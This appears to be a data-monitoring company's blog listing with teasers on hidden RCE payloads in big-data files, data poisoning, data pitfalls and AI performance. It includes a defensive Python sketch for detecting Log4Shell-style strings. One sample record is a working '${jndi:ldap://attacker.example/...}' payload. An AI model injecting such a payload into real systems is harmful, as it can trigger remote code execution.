In this article, we describe how a single, intentionally formatted text string (a malicious payload hidden among millions of otherwise valid data points in a densely packed big data file) was used to trigger a Remote Code Execution ("RCE") exploit.
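The article does not disclose the specific payload, but a Log4Shell-style `${jndi:...}` lookup string is a well-known example of a single formatted record that can trigger RCE downstream. As a minimal, hypothetical sketch of the monitoring idea, the following scans newline-delimited records for that class of pattern (the pattern list and record format are illustrative assumptions, not Zectonal's implementation):

```python
import re

# Assumption: records arrive as newline-delimited JSON strings.
# The pattern below matches Log4Shell-style lookup payloads, one
# well-known way a single record can hide among millions of valid ones.
SUSPICIOUS = re.compile(r"\$\{(?:jndi|env|lower|upper)\s*:", re.IGNORECASE)

def find_suspicious_records(records):
    """Yield (record_number, record) for records matching the pattern."""
    for i, record in enumerate(records, start=1):
        if SUSPICIOUS.search(record):
            yield i, record

records = [
    '{"id": 1, "msg": "normal telemetry"}',
    '{"id": 2, "msg": "${jndi:ldap://attacker.example/a}"}',
    '{"id": 3, "msg": "another normal record"}',
]
hits = list(find_suspicious_records(records))
# hits flags only the second record
```

In practice such scanning would run at ingest, before the data reaches log frameworks or query engines that might interpret the payload.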
Polluted data lakes are an increasingly serious problem, giving rise to AI bias as well as data and AI poisoning security vulnerabilities.
Learn about 7 critical pitfalls to avoid when working with your data, and how Zectonal's latest innovations in data monitoring software can help you discover them.
In an increasingly crowded ecosystem of software applications across every conceivable market, it is no longer viable to compete solely on functional differentiators.
One of the publications that has resonated most over the past twelve months is Marc Andreessen's call to action, "It's Time To Build." Published in the immediate aftermath of the coronavirus outbreak, it garnered much attention, and its broader call to keep building remains important almost a year later.
Poorly performing AI cannot predict correctly, cannot classify correctly, is vulnerable from a cybersecurity perspective, is neither durable nor reliable, and its outcomes lead to bad decision-making. Even more concerning, most organizations find it difficult to diagnose or quantify AI performance.